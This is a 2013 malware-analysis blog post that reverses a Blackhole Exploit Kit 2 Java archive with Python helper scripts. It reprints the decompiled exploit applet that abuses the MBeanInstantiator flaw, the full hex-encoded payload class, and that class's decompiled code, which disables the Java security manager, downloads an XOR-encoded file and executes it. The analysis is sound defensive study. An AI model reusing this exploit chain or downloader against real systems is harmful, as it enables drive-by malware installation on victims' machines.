Wednesday, March 6, 2013

Having fun reversing BHEK2 Java archives using Python


Having fun reversing BHEK2 Java Archives


- And since I need to learn more Python(not Monty that is) I just thought I would throw in a couple of Python scripts for the deobfuscation.


A couple of days back I looked into fetching the exploit files from the BHEK2.

While doing that excersise I got a couple of JAR archives. Lets look at one of them(They are almost identical anyway).


Now lets look into how the java code for this EK is built and what it does.


Just a reminder: I'm NO Java FU master so terminology and correctness might be sloppy. But I hope that we can get the job done.

0.First thing first: Unzip the JAR archive.  


$unzip 9_3.jar
/EK/cinema/9_3_jar$ unzip 9_3.jar 
Archive:  9_3.jar
   creating: META-INF/
  inflating: META-INF/MANIFEST.MF    
  inflating: hw.class                
  inflating: codehex.class           
  inflating: Impossible.class        
  inflating: RunnerGood.class        
  inflating: d.class                 
  inflating: Asd.class               
  inflating: test.class              
  inflating: test2.class



1. The Applet is where the adventure start, as that is whats called from the HTML code. 

Thats a class that extends java.lang.Applet. Since I have seen a couple of network traces of BHEK2 before I remember that to be hw.class.
To be able to read the source code of the class files we just unzipped, we need to reverse it from the Java byte code and back to readable source code.

showmycode.com is a nice tool for this! or if you prefer commandline: jad. Simpy "jad hw.class"

2. The applet - hw.class 

import java.applet.Applet;
import java.lang.reflect.Constructor;
import java.lang.reflect.Method;

public class hw extends Applet
{

    public hw()
    {
    }

    public static String pah(String s)
    {
        return (new StringBuffer(s)).reverse().toString();
    }

    public static byte[] shy(String s)
    {
        byte abyte0[] = new byte[s.length() / 2];
        for(int i = 0; i < s.length(); i += 2)
        {
            byte byte0 = (byte)((Character.digit(s.charAt(i), 16) << 4) + Character.digit(s.charAt(i + 1), 16));
            abyte0[i / 2] = byte0;
        }

        return abyte0;
    }

    public static Object rue(String s, String s1, Object obj)
        throws ReflectiveOperationException
    {
        return test2.rue2(s, s1, obj, new Class[0], new Object[0]);
    }

    public void init()
    {
        try
        {
            Class class1 = RunnerGood.bug(pah((new StringBuilder(String.valueOf(RunnerGood.zz))).append("vaj.allizom.gro.n".concat("us")).toString()));
            Method method = codehex.lot(class1, "enter", true);
            Object obj = method.invoke(null, new Object[0]);
            Method method1 = codehex.lot(class1, "createClassLoader", false);
            Object obj1 = method1.invoke(obj, new Object[1]);
            byte abyte0[] = d.decodeH(test2.one());
            Class class2 = RunnerGood.bug(pah("redaoLssalCdetareneG.lanretn".concat("i.tpircsavaj.all".concat("izom.gro.nus"))));
            Method method2 = codehex.lot(class2, test2.dd, false);
            String str12 = d.get(this);
            if(str12.indexOf("::") == -1)
            {
                Class class3 = (Class)method2.invoke(obj1, new Object[] {
                    0, abyte0
                });
                Constructor localConstructor = class3.getConstructor(new Class[] {
                    java/lang/String
                });
                localConstructor.newInstance(new Object[] {
                    str12
                });
            } else
            {
                Class my_class = (Class)method2.invoke(obj1, new Object[] {
                    0, Asd.arrayOfByte2
                });
                my_class.newInstance();
                Method mmm = my_class.getMethod("r", new Class[] {
                    java/lang/String, java/lang/Class
                });
                float a = 0.0F;
                mmm.invoke(null, new Object[] {
                    str12, hw
                });
            }
        }
        catch(Exception e)
        {
            e.printStackTrace();
        }
    }

    public static String gouerpyftn(String paramString)
    {
        String str2;
        String str1 = Asd.getKkkk();
        str2 = "";
        for(int i = 0; i < paramString.length(); i++)
        {
            Object localObject = Character.valueOf(paramString.charAt(i));
            int j = str1.indexOf(localObject.toString());
            if(j != -1)
            {
                if(j != 0)
                {
                    localObject = Character.valueOf(str1.charAt(j - 1));
                    str2 = (new StringBuilder(String.valueOf(str2))).append(localObject.toString()).toString();
                } else
                {
                    localObject = Character.valueOf(str1.charAt(str1.length() - 1));
                    str2 = (new StringBuilder(String.valueOf(str2))).append(localObject.toString()).toString();
                }
            } else
            {
                localObject = Character.valueOf(paramString.charAt(i));
                str2 = (new StringBuilder(String.valueOf(str2))).append(localObject.toString()).toString();
            }
        }

        return str2;
        Exception exception;
        exception;
        return "";
    }
}

Links to the classes @ showmycode.com:

hw.class              
codehex.class        
Impossible.class      
RunnerGood.class      
d.class              
Asd.class            
test.class            
test2.class


To the fun stuff! Can we figure out what the bad guys are up to, even when they do not want us to.

3. init() is the start of an applet so here is where we have to start investigating.

Class class1 = RunnerGood.bug(pah((new StringBuilder(String.valueOf(RunnerGood.zz))).append("vaj.allizom.gro.n".concat("us")).toString()));


Here the last string is appended to the string zz from the class RunnerGood (public static String zz = "txetnoC.lanretni.tpircsa";) and then the method pah() is run with that string as input. pah() just reverses the string and we end up with "sun.org.mozilla.javascript.internal.Context"

That string is sent into the bug() method of class RunnerGood.
That method is trying to find a class. Note also that there are referenses to MbeanInstantiator which was the problem with one of the Java 0-Days in January: CVE-2013-0422. Excellent paper on that here, And as we can see that is the exact trick used.


Having fun yet? That was not so hard :)

Line 40: Method method = codehex.lot(class1, "enter", true);
returning a method based on the params given to it.

Line 41: instantiate obj.

The whole thing is repeated and obj1 is instantiated.

Line 44: looks like we are going to start with the strings
byte abyte0[] = d.decodeH(test2.one()); the bytearray abyte0 is set:

OK, a lot of strings to concatenate and process.

4. Making use of Python

Here is where I take some time to code som Python and came up with the script below. I just grepped for the strings, redirected them to a file and renamed them. Swapped concat with "+" and cleaned it up a bit. Then I implemented the methods/functions.

getKkkk()

gouerpyftn(paramString)

one()

decodeH(paramString)


# malforsec BHEK Java deobfuscation 0.9

#Key
def getKkkk():
  str1 = "b12gO6%oh3}lfs98^mYauL5{qiy)RKpk40(VXBrtW&DzCFA-JndU_eZwTNHc+7QMx*vIPSGE"
  return str1;

#Deobfuscate main
def gouerpyftn(paramString):
  str1 = getKkkk()
  str2 = ""
  for i in range (0, len(paramString), 1):  
    c = paramString[i]
    j = str1.find(c)
    if j != -1:
      if j != 0:
        str2 += str1[(j-1)]
      else:
        str2 += str1[len(str1)-1]
    else:
      str2 =+ paramString[i]
  return str2

def one():
  str1 = impossible_str17 + test_str114 + test_str116 + test_str119 + asd_str122 + asd_str123 + asd_str124 + asd_str125
  return str1

def decodeH(paramString):
  str1 = ""
  for i1 in range(0, (len(paramString)/2), 1):
# Lets shorten the code a bit here and drop the codehex.ttt call
#    arrayOfByte[i1] = codehex.ttt(paramString, i1);
    str1 += str(chr(int(paramString[(i1*2):((i1*2)+2)], 16)))
  return str1

test2_str1 = "F-Abr-rb((((((}g((Ar(-(((8((0r(8((}}((0F(^((0z(-"
test2_str2 = "(((%((0b(^((0A(Q(({((^(({2(-(((%(({g(Q(({"
test2_str3 = "}(-(({0(({{(Q(({%(-(({Q(({^(Q(({8(-(((z((0r(}("
test2_str4 = "((A0g0((}((Q-2g(((-(((z(({-(Q(({r(-((2g((0r"
test2_str5 = "(-((2g(({F(^(({z(-((2g(({b(-((2g(({A(^((%((-(({Q("
test2_str6 = "(%2(^((%g(-((gF(({A(Q((%}(-((2F((%0(-((2F((%{(-((%%((%"
test2_str7 = "Q(^((%^(-((%%((%8(^((%-(-((gF((%r(^((%F(Q((%z(-((g{((%0(-((%"
test2_str8 = "b((%A(-((g{((Q((-((%b((Q2(-((g{((Q2(-((Qg((Q}(Q((Q0(^(("
test2_str9 = "Q{(^((Q%(^((QQ(^((Q^(-((Qg((Q8(-(({Q((Q-(Q((Qr(Q((QF(2"
test2_str10 = "(((2%2(2((2g0F%-%2Q%%2gA%F%2%b%QgA{}Q0Qg%8%b%Q}r(2(((%}F"
test2_str11 = "%8%b%8Q0}b(2((2{g^0F%-%2Q%%2gA%F%2%b%QgA{}Q0Qg%8%"
test2_str12 = "b%Q}rg8{%(2(((00}%A%0%{(2(((A0F%8%b%{0bQ{%z%g%{Qg{"
test2_str13 = "0%2%g%F%{(2(((z{}Q0%2%}%r0z%2Q({0%2%g%F%{(Q((Qr(Q(("
test2_str14 = "Q0(Q(({%(2(((}QgQ{%b(2((20g^g80F%-%2Q%%2gA%F%2%b%QgA0A%g%"
test2_str15 = "-%{%}Q0}r(Q(({8(Q((%}(Q((Qz(Q((Qb(Q((%z(Q((QA(Q((^((2(((-0"
test2_str16 = "{Q^%}%{Q(Q0%8%A%bQ}(2(((-{}%AQ{Qg%"

impossible_str17 = gouerpyftn(test2_str1 + test2_str2 + test2_str3 + test2_str4 + test2_str5 + test2_str6 + test2_str7 + test2_str8 + test2_str9 + test2_str10 + test2_str11 + test2_str12 + test2_str13 + test2_str14 + test2_str15 + test2_str16)

impossible_str27 = "}%{0%%8%F%{(2(((F%-%2Q%%2{gQ{%bgb%-%2Q%%"
impossible_str28 = "2(F((}Q((^2(F((}{((}%(2((2Agz%A%}2gQr}0%rQ%(%gQgbQ-%F{z20g"
impossible_str29 = "0%zQ(F(^(g%(0%2Qr(QgQg^%gQ82%gQ(F((^g((^}(2(((Fg}%20{(2}F}"
impossible_str30 = "2%QQ82%}ggg%-(2(((A%-%2Q%%2gA%F%2%b%QgA0}%F%2Q}Q}("
impossible_str31 = "2((gQgz%A%}2gQr}0%rQ%(%gQgbQ-%F{z({}{%Q%}2-}8gg%8Q(2Q2"
impossible_str32 = "(}A%zQ((}g2gb%2Qr}g}%}}%QQ-2z(F((^0((^{(2("
impossible_str33 = "(2(%-%2Q%%2gA%F%2%b%QgA0A%g%-%{%}Q0(Q((^%(F((^Q((^^("
impossible_str34 = "2((2}%-%2Q%%2gA%F%2%b%QgA0{Q^%}%{Q(Q0%8%A%"
impossible_str35 = "b(Q((^8(F((^-((^r(2((2(%-%2Q%%2gAQ{Q0%8%FgA{g%2%b%0%A%z"
impossible_str36 = "(F((^F((^z(2((2Q%-%2Q%%2gA%F%2%b%QgA{}Q0Qg%8%b%Q"
impossible_str37 = "0gQ{%8%F%0%{Qg(F((^b((^A(2(((0%8%r%z2%(F(("
impossible_str38 = "^b((8((F((82((8g(2(((8}gQzQ((2QrgA%2Q^2%(F((8"
impossible_str39 = "}((80(2(((2gA(2(((F%-%2Q%%2gA%b%{Q0gA{{{g"
impossible_str40 = "0F(F((}Q((}^(F((8{((8%(Q((Qz(F((8Q((8^(2((20(0%2Qr(Q}(g8Q-}^"
impossible_str41 = "}Q}F}0QbQ-F(^(}F}}%QQ-2z(F((88((80(2(((0%8Q-Q^(}(F("
impossible_str42 = "(8-((8r(2(((0%8%-Q82A(2((2^%-%2Q%%2gA%8%AgA0%%8%F%{0A"
impossible_str43 = "Q{Q0Q(Q{Q0{}Q0Qg%{%2%z(Q((Qb(F((8F((8z(F((8b(("
impossible_str44 = "8A(F((-(((^2(Q((^((F((-2((-g(2((2(%-%2Q%%"
impossible_str45 = "2gA%F%2%b%QgA{}Q0Qg%8%b%Q(2(((Qg0%}Q2{z}(}A%r"
impossible_str46 = "(2(((g%^0z(2(((8}{%rQgF(^(g}}{}zgQ(2(((g%-Qz(F((-}((-"
impossible_str47 = "0(F((-{((-%(2(((Q%-%2Q%%2{gQ{%b(2((gQ%-%2Q"
impossible_str48 = "%%2gAQ}%{%}Q{Qg%8Q0Q8gA{(Qg%8Q%%8%F%{%Q%{"
impossible_str49 = "{Q^%}%{Q(Q0%8%A%b02%}Q0%8%A%b(2((2%%-%2Q%%2gA%b%{Q0"
impossible_str50 = "gA{{{g0F0}%A%b%b%{%}Q0%8%A%b(2((2}%-%2Q%%2"

test_str114 = gouerpyftn(impossible_str27 + impossible_str28 + impossible_str29 + impossible_str30 + impossible_str31 + impossible_str32 + impossible_str33 + impossible_str34 + impossible_str35 + impossible_str36 + impossible_str37 + impossible_str38 + impossible_str39 + impossible_str40 + impossible_str41 + impossible_str42 + impossible_str43 + impossible_str44 + impossible_str45 + impossible_str46 + impossible_str47 + impossible_str48 + impossible_str49 + impossible_str50)

impossible_str54 = "gA%8%AgA08%bQ(Q{Q0{}Q0Qg%{%2%z(2(((g{r0g(2((22%-%2"
impossible_str55 = "Q%%2gA%F%2%b%QgA{gQ{%bQ0%8%z%{(2(((}g^g8{%(2"
impossible_str56 = "(((Q%%%AQg0b%2%z%{(2((g{g^0F%-%2Q%%2gA%F%2%b%Qg"
impossible_str57 = "A{}Q0Qg%8%b%Q}rg80F%-%2Q%%2gA%F%2%b%QgA0}%F%2Q}Q}}r(2(((8%"
impossible_str58 = "Q%{Q00z%{Q0%^%A%0(2((0(g^0F%-%2Q%%2gA%F%2%b%QgA{"
impossible_str59 = "}Q0Qg%8%b%Q}r{r0F%-%2Q%%2gA%F%2%b%QgA0}%F%2Q}Q}}"
impossible_str60 = "rg80F%-%2Q%%2gA%F%2%b%QgAQg%{%%%F%{%}Q0gA0z%{Q0%^%A%0"
impossible_str61 = "}r(2((2^%-%2Q%%2gA%F%2%b%QgAQg%{%%%F%{%}Q0gA0z%"
impossible_str62 = "{Q0%^%A%0(2(((%%8%bQ%%A%r%{(2((}8g^0F%-%2Q%%2g"
impossible_str63 = "A%F%2%b%QgA0A%g%-%{%}Q0}r{r0F%-%2Q%%2gA%F%2%b%QgA0A%g%-%{%}Q"
impossible_str64 = "0}rg80F%-%2Q%%2gA%F%2%b%QgA0A%g%-%{%}Q0}r("
impossible_str65 = "2((2(%-%2Q%%2gA%F%2%b%QgA{}Q8Q}Q0%{%z(2((2gQ}%"
impossible_str66 = "{Q0{}%{%}Q{Qg%8Q0Q80z%2%b%2%Q%{Qg(2((2bg^0F%-%2Q%%2gA%F%2%b%"
impossible_str67 = "QgA{}%{%}Q{Qg%8Q0Q80z%2%b%2%Q%{Qg}rg8{%(2(((Q%b%{Q^Q008%bQ"
impossible_str68 = "0(2(((0g^08g808(2(((%%2Q(Q(%{%b%0(2((2Fg^08g80F%-%2Q%%2g"
impossible_str69 = "A%F%2%b%QgA{}Q0Qg%8%b%Q0gQ{%8%F%0%{Qg}r(2((gzg^0F%-%2Q"
impossible_str70 = "%%2gA%F%2%b%QgA{}Q0Qg%8%b%Q}rg80F%-%2Q%%2gA%F%2"
impossible_str71 = "%b%QgA{}Q0Qg%8%b%Q0gQ{%8%F%0%{Qg}r(2(((^Q0%A{}Q0Q"
impossible_str72 = "g%8%b%Q(2((20g^g80F%-%2Q%%2gA%F%2%b%QgA{"
impossible_str73 = "}Q0Qg%8%b%Q}r(2(((r%Q%{Q0{(Qg%AQ(%{QgQ0Q"
impossible_str74 = "8(2((g%g^0F%-%2Q%%2gA%F%2%b%QgA{}Q0Qg%8%b"
impossible_str75 = "%Q}rg80F%-%2Q%%2gA%F%2%b%QgA{}Q0Qg%8%b%Q}r(2(((b%A"
impossible_str76 = "Q(%{%b0}%A%b%b%{%}Q0%8%A%b(2((2-g^g80F%-%2Q"
impossible_str77 = "%%2gA%b%{Q0gA{{{g"

test_str116 = gouerpyftn(impossible_str54 + impossible_str55 + impossible_str56 + impossible_str57 + impossible_str58 + impossible_str59 + impossible_str60 + impossible_str61 + impossible_str62 + impossible_str63 + impossible_str64 + impossible_str65 + impossible_str66 + impossible_str67 + impossible_str68 + impossible_str69 + impossible_str70 + impossible_str71 + impossible_str72 + impossible_str73 + impossible_str74 + impossible_str75 + impossible_str76 + impossible_str77)

impossible_str78 = "4C436F6E6E656374696F6E3B01000E676574496E707574"
impossible_str79 = "53747265616D01001728294C6A6176612F696F2F496E707574537472656"
impossible_str80 = "16D3B01000E6765744865616465724669656C6401000769"
impossible_str81 = "6E6465784F66010015284C6A6176612F6C616E672F537472696E67"
impossible_str82 = "3B294901000472656164010007285B42494929490100"
impossible_str83 = "057772697465010007285B4249492956010005636C6F736501000A6"
impossible_str84 = "7657452756E74696D6501001528294C6A6176612F6C616E672F5"
impossible_str85 = "2756E74696D653B01000465786563010028285B4C6A61766"
impossible_str86 = "12F6C616E672F537472696E673B294C6A6176612F6C616"
impossible_str87 = "E672F50726F636573733B010004657869740100042849295"
impossible_str88 = "60100095A4B4D352E342E3561010001620100015A01000163"
impossible_str89 = "0C00AA00A909003300AB0100017A0100135B4C6A6176612F6C616E672F53"
impossible_str90 = "7472696E673B0100083C636C696E69743E0C00B100B201000B7"
impossible_str91 = "46F43686172417272617901000428295B430A002C0"
impossible_str92 = "0B00C003700B5010005285B4329560A002C00B40C0"
impossible_str93 = "0B80092010006696E7465726E0A002C00B70C00AD00AE0900"
impossible_str94 = "3300BA0700BD0100146A6176612F696F2F53657269616C697A6162"

test_str95 = "6C650700AE0700AE0700AE0700AE0700AE0700AE0700AE0"
test_str96 = "700AE0700AE0700AE0700AE0700AE0700AE0700AE070"
test_str97 = "0AE0700AE0700AE0700AE0700AE0700AE0700AE0700AE0700AE07"
test_str98 = "00AE0700AE0700AE0700AE0700AE0700DB0100025B430700AE0700AE070"
test_str99 = "0DB0700DB0700AE0700AE0700DB0700DB0700AE0700AE0700DB0"
test_str100 = "700DB0700AE0700AE0700DB0700DB0700AE0700AE0700DB0700D"
test_str101 = "B0700AE0700AE0700DB0700DB0700AE0700AE0700DB0700DB0700"
test_str102 = "AE0700AE0700DB002100330009000100340004000"
test_str103 = "0003500360000000900A800A90000000900AA00A900000"
test_str104 = "01A00AD00AE00000003000100370038000100390000008A00070003"
test_str105 = "000000412AB700012A2BB50002B200BB0332B80004B200BB053204BD0006"
test_str106 = "5903B200BB0432B8000453B60008B200BB0332B8000404"
test_str107 = "BD000959032A53B6000A57A700044DB100010009003C003F0"
test_str108 = "00B0002003A000000160005000000250004000E00090"
test_str109 = "00B003C002700400006003B000000130002FF003F0002070033070"
test_str110 = "02C000107000B000001003F0040000200390000047"
test_str111 = "30008001100000223B200AC361001B8000CBB000D59B7000E4C"
test_str112 = "120F2B1210B60011603D"

test_str119 = impossible_str78 + impossible_str79 + impossible_str80 + impossible_str81 + impossible_str82 + impossible_str83 + impossible_str84 + impossible_str85 + impossible_str86 + impossible_str87 + impossible_str88 + impossible_str89 + impossible_str90 + impossible_str91 + impossible_str92 + impossible_str93 + impossible_str94 + test_str95 + test_str96 + test_str97 + test_str98 + test_str99 + test_str100 + test_str101 + test_str102 + test_str103 + test_str104 + test_str105 + test_str106 + test_str107 + test_str108 + test_str109 + test_str110 + test_str111 + test_str112

asd_str122 = "ZZ001259Z700131CZ60014Z200ZZ100632Z60016Z600174EZZ001259Z70013Z200ZZ0732Z80019Z60016121AZ60016Z600173A04ZZ001259Z700132AZ40002Z6001ZZ600161CZ60014Z600173A05ZZ001C591905Z7001D3A061906Z6001E3A071907Z6001F3A080336091907Z200ZZ100A32Z600213A0A190A15109A000CC60058A70004ZF190AZ200ZZ100932Z6002315109A002Z02A00022A70004ZF190AZ200ZZ0632Z6002315109A0014A70004ZF029F0025A70004ZF04A70004ZF3609ZZ001259Z700131CZ60014Z200ZZ0632Z60016Z600174EZZ002559ZZ001259Z700131904Z600162DZ60016Z".replace("Z", "B")
asd_str123 = "60017B700263A0B110400BC083A0D1C360E1908190D03190DBEB6002759360C029F005115109A005603360F150F150CA20033150E1100AA601100FF7E360E150E104882360E190D150F5C33150E91829154840F0115109A0016151099FFD0A70004BF190B190D03150CB60028151099FFA31908B60029190BB6002AB8002B3A0F15109A00531509990053A70004BF190F08BD002C5903B200BB100732535904B200BB0832535905B200BB100B32535906B200BB100832535907BB001259B700131904B600162DB60016B6001753B6003157A70004BF1510990038190F06BD002C5903B200BB100732535904B200BB0832535905BB001259B700131904B600162DB60016B6001753B6003157A70004BF03B80032A700084C03B8003201B0000A01DB02110214000B018D01D701DA000B018601900193000B014B01640167000B00CC00D400D7000B00BA00CF00D2000B00B100C700CA000B00A200B400B7000B0092009C009F000B00050219021C000B0002003A0000009200240005001A0009002800110016001B001100330005004F00120069001800740010007B0013008200150085000F0092001E00A0002600D3001B00DA002400F10022010D000A0"
asd_str124 = "114001401170004012900170138000C0144001D014B0021015700290168002001770019017C00090181001C0186001F0194000D01E000010215000302190002021C0007021D000802210023003B00000156001CFF009F001107003307000D0107002C07002C07002C07001C0700430700440107002C000000000001000107000B004107002C5407000B005107000B40014607000B004307000B400118FF0025001107003307000D0107002C07002C07002C07001C0700430700440107002C070025000700460100010000FF0019001107003307000D0107002C07002C07002C07001C0700430700440107002C0700250107004601010100007507000B0009FF0004001107003307000D0107002C07002C07002C07001C0700430700440107002C07002501070046010001000009FF0011001107003307000D0107002C07002C07002C07001C0700430700440107002C070025010700460107004701000107000B00F7004507000B00047307000B00FF0006001107003300000000000000000000000000000001000107000BFF000400110700330700BC00000000000000000000000000000100000048000000040001000B000800AF00810001003900000305000C00010000012D100CBD002C5903120310FFA70078535904120703A7006F535905120504A70066535906122405A7005D535907121806A70054535908122E07A7004B53591006121508A7004153591007122D1006A700365359100812301007A7002B5359100912221008A700205359100A12201009A700155359100B122F100AA7000A53B300BBA700AC5FB600B359BE5F033B5F5A04A3004F591A5C341A0870AA00000000003300000000000000030000001F00000024000000290000002E1047A70014100EA7000F1015A7000A1073A7000510558292558400015F5A9A00085C5FA7FFB95F5A1AA3FFB1BB002C5A5FB700B6B600B95F575FAA00FFFFFF1C000000000000000AFFFFFF25FFFFFF2EFFFFFF37FFFFFF40FFFFFF49FFFFFF53FFFFFF5EFFFFFF69FFFFFF74FFFFFF7FFFFFFF8AB100000001003B000001C60017FF000E00010100040700BE0700BF0107002CFF000800010100040700C00700C10107002CFF000800010100040700C20700C30107002CFF000800010100040700C40700C50107002CFF000800010100040700C60700C70107002CFF000800010100040700C80700C90107002CFF000900010100040700CA0700CB0107002CFF000A00010100040700CC0700CD0107002CFF000A00010100040700CE0700CF0107002CFF000A00010100040700D00700D10107002CFF000A00010100040700D20700D30107002CFF000A00010100040700D40700D50107002CFF0006000000050700D60700D70107002C01FF000E00010100060700D80700D90101010700DAFF000100010100080700DC0700DD0101010700DE0700DF01FF002300010100090700E00700E10101010700E20700E30101FF000400010100090700E40700E50101010700E60700E70101FF000400010100090700E80700E90101010700EA0700EB0101FF000400010100090700EC0700ED0101010700EE0700EF0101FF000400010100090700F0"
asd_str125 = "0700F10101010700F20700F30101FF0001000101000A0700F40700F50101010700F60700F7010101FF000F00010100060700F80700F90101010700FAFB004D0001004900000002004A"


codehex_aa = "(?i).j";
asd_zxc = "xe"
asd_zxc2 = ".e"

#hw_str12 = aaz().replace("?jar", ".exe") + "?"

def main():
  abyte0 = decodeH(one())
  print abyte0

if __name__ == "__main__":
    main()


Run the script and it will print Java Bytecode for the class the Bad Guys want to run on your system(Thrugh the exploitation of the MBeanInstantiator bug they can now call restricted classes)
redirect the output to a .class file. e.g.

$python decode_blachole.py > bhclass.class


Ok so where are we at? Well at this time we are probably hungry, so open a tin of SPAM, enjoy and move on.

5. Back to Java disassembly again

The bytecode needs to be disassembled so back to jad or showmycode.com. And we get the output:

import java.io.*;
import java.lang.reflect.Method;
import java.net.URL;
import java.net.URLConnection;
import java.security.PrivilegedExceptionAction;
import java.util.Random;

public class javaRun
    implements PrivilegedExceptionAction
{

    public javaRun(String s)
    {
        a = s;
        try
        {
            Class.forName(z[0]).getMethod(z[2], new Class[] {
                Class.forName(z[1])
            }).invoke(Class.forName(z[0]), new Object[] {
                this
            });
        }
        catch(Exception exception) { }
    }

    public Object run()
        throws Exception
    {
        boolean flag = c;
        int i;
        String s;
        String s1;
        InputStream inputstream;
        int j;
        String s3;
        System.setSecurityManager(null);
        Random random = new Random();
        i = 0xf4240 + random.nextInt(0x7a1200);
        s = (new StringBuilder()).append(i).append(z[6]).toString();
        s1 = (new StringBuilder()).append(System.getProperty(z[4])).append("/").toString();
        String s2 = (new StringBuilder()).append(a.toString()).append(i).toString();
        URL url = new URL(s2);
        URLConnection urlconnection = url.openConnection();
        inputstream = urlconnection.getInputStream();
        j = 0;
        s3 = urlconnection.getHeaderField(z[10]);
        s3;
        if(flag) goto _L2; else goto _L1
_L1:
        if(s3 == null)
            break MISSING_BLOCK_LABEL_241;
          goto _L3
        throw ;
_L3:
        s3;
_L2:
        z[9];
        indexOf();
        if(flag)
            break MISSING_BLOCK_LABEL_216;
        -1;
        JVM INSTR icmpne 211;
           goto _L4 _L5
_L4:
        break MISSING_BLOCK_LABEL_184;
_L5:
        break MISSING_BLOCK_LABEL_211;
        throw ;
        s3;
        z[3];
        indexOf();
        if(flag)
            break MISSING_BLOCK_LABEL_216;
        break MISSING_BLOCK_LABEL_203;
        throw ;
        -1;
        JVM INSTR icmpeq 241;
           goto _L6 _L7
_L6:
        break MISSING_BLOCK_LABEL_211;
_L7:
        break MISSING_BLOCK_LABEL_241;
        throw ;
        throw ;
        j = 1;
        s = (new StringBuilder()).append(i).append(z[3]).toString();
        FileOutputStream fileoutputstream;
        byte abyte0[];
        int l;
        fileoutputstream = new FileOutputStream((new StringBuilder()).append(s1).append(s).toString());
        abyte0 = new byte[1024];
        l = i;
_L11:
        int k;
        int i1;
        if((k = inputstream.read(abyte0, 0, abyte0.length)) == -1)
            break; /* Loop/switch isn't completed */
        if(flag)
            break MISSING_BLOCK_LABEL_385;
        i1 = 0;
_L9:
        if(i1 >= k)
            break; /* Loop/switch isn't completed */
        l = l + 170 & 0xff;
        l ^= 0x48;
        abyte0[i1] ^= (byte)l;
        i1++;
        if(flag)
            continue; /* Loop/switch isn't completed */
        if(!flag) goto _L9; else goto _L8
        throw ;
_L8:
        fileoutputstream.write(abyte0, 0, k);
        if(!flag) goto _L11; else goto _L10
_L10:
        inputstream.close();
        fileoutputstream.close();
        Runtime runtime = Runtime.getRuntime();
        if(flag)
            break MISSING_BLOCK_LABEL_475;
        j;
        JVM INSTR ifeq 480;
           goto _L12 _L13
_L12:
        break MISSING_BLOCK_LABEL_404;
_L13:
        break MISSING_BLOCK_LABEL_480;
        throw ;
        runtime.exec(new String[] {
            z[7], z[5], z[11], z[8], (new StringBuilder()).append(s1).append(s).toString()
        });
        break MISSING_BLOCK_LABEL_475;
        throw ;
        if(!flag)
            break MISSING_BLOCK_LABEL_533;
        runtime.exec(new String[] {
            z[7], z[5], (new StringBuilder()).append(s1).append(s).toString()
        });
        break MISSING_BLOCK_LABEL_533;
        throw ;
        System.exit(0);
        break MISSING_BLOCK_LABEL_545;
        Exception exception;
        exception;
        System.exit(0);
        return null;
    }

    String a;
    public static boolean b;
    public static boolean c;
    private static final String z[];

    static 
    {
        String as[] = new String[12];
        as;
        as;
        0;
        "-oc\022{4kv\006'.zl]\024$mp\000&\004a{\007'(by\026'";
        -1;
          goto _L1
_L7:
        JVM INSTR aastore ;
        JVM INSTR dup ;
        true;
        "-oc\022{4kv\006'.zl]\0055gc\0329\"ip\027\020?mp\003!.a{263gz\035";
        false;
          goto _L1
_L8:
        JVM INSTR aastore ;
        JVM INSTR dup ;
        2;
        "#aE\001<1gy\0262\"j";
        true;
          goto _L1
_L9:
        JVM INSTR aastore ;
        JVM INSTR dup ;
        3;
        "ijy\037";
        2;
          goto _L1
_L10:
        JVM INSTR aastore ;
        JVM INSTR dup ;
        4;
        "2}p\001{/ax\026";
        3;
          goto _L1
_L11:
        JVM INSTR aastore ;
        JVM INSTR dup ;
        5;
        "hM";
        4;
          goto _L1
_L12:
        JVM INSTR aastore ;
        JVM INSTR dup ;
        6;
        "ikm\026";
        5;
          goto _L1
_L13:
        JVM INSTR aastore ;
        JVM INSTR dup ;
        7;
        "$cq]0?k";
        6;
          goto _L1
_L14:
        JVM INSTR aastore ;
        JVM INSTR dup ;
        8;
        "j}";
        7;
          goto _L1
_L15:
        JVM INSTR aastore ;
        JVM INSTR dup ;
        9;
        "izx\003";
        8;
          goto _L1
_L16:
        JVM INSTR aastore ;
        JVM INSTR dup ;
        10;
        "\004a{\0070)z87<4~z\000<3gz\035";
        9;
          goto _L1
_L17:
        JVM INSTR aastore ;
        JVM INSTR dup ;
        11;
        "5kr\000#5='";
        10;
          goto _L1
_L18:
        JVM INSTR aastore ;
        z;
_L1:
        JVM INSTR swap ;
        toCharArray();
        JVM INSTR dup ;
        JVM INSTR arraylength .length;
        JVM INSTR swap ;
        int i = 0;
        JVM INSTR swap ;
        JVM INSTR dup_x1 ;
        1;
        JVM INSTR icmpgt 222;
           goto _L2 _L3
_L2:
        JVM INSTR dup ;
        i;
_L5:
        JVM INSTR dup2 ;
        JVM INSTR caload ;
        byte byte0;
        switch(i % 5)
        {
        case 0: // '\0'
            byte0 = 0x47;
            break;

        case 1: // '\001'
            byte0 = 14;
            break;

        case 2: // '\002'
            byte0 = 21;
            break;

        case 3: // '\003'
            byte0 = 115;
            break;

        default:
            byte0 = 85;
            break;
        }
        byte0;
        JVM INSTR ixor ;
        (char);
        JVM INSTR castore ;
        i++;
        JVM INSTR swap ;
        JVM INSTR dup_x1 ;
        JVM INSTR ifne 222;
           goto _L4 _L3
_L4:
        JVM INSTR dup2 ;
        JVM INSTR swap ;
          goto _L5
_L3:
        JVM INSTR swap ;
        JVM INSTR dup_x1 ;
        i;
        JVM INSTR icmpgt 146;
           goto _L6 _L2
_L6:
        JVM INSTR new #44  <Class String>;
        JVM INSTR dup_x1 ;
        JVM INSTR swap ;
        String();
        intern();
        JVM INSTR swap ;
        JVM INSTR pop ;
        JVM INSTR swap ;
        JVM INSTR tableswitch 0 10: default 14
    //                   0 23
    //                   1 32
    //                   2 41
    //                   3 50
    //                   4 59
    //                   5 69
    //                   6 80
    //                   7 91
    //                   8 102
    //                   9 113
    //                   10 124;
           goto _L7 _L8 _L9 _L10 _L11 _L12 _L13 _L14 _L15 _L16 _L17 _L18
    }
}

Crap!!! what is this all about. This should be a happy ending where we had a nice and shiny class file disassembled but instead this code really got me wondering. I'm no Java Ken Guru, but this one beat me up. Luckily there is a lot of people knowing more than me about this and I found a great post about what this was here @ Security Obscurity Blog and even more @ The PlayGround.dk,

6. Introducing the Zelix Klassmaster 

 - Or what I would call it: "The Spanish Inquisition" youtube


So more work to do: I justed followed Mr. Larsens guide and came up with, well a Python script to decrypt The Spanish Inquisition, eh, Zelix Klassmaster encrypted strings:
#malforsec decrypt Spannish Inquisition encrypted strings 0.9.1
def decode(str1):
  decrstr = ""
  key = [71, 14, 21, 115, 85]
  for i in range(0, len(str1), 1):
    decrstr += chr((ord(str1[i])) ^ (key[i % 5]))
  return decrstr

